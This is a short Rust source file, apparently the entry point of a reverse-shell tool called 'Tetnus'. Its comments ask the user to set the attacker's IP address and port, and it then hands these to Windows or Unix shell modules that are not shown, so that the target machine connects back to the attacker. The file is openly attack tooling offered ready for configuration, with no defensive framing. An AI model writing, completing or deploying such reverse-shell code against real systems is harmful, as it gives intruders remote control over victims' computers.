extern crate tokio;

// Do not edit this file other than the IP and port values or Tetnus may not work as expected.
#[cfg(unix)]
mod unix_shell;

#[cfg(windows)]
mod windows_shell;

fn main() {

    // TODO Set attackers IP here
    let ip = String::from("127.0.0.1");
    // TODO Set port here
    let port = String::from("6666");

    if cfg!(target_os = "windows"){
        #[cfg(windows)]
        windows_shell::shell(ip, port);
    }
    else {
        #[cfg(unix)]
        unix_shell::shell(ip, port);
    };
}
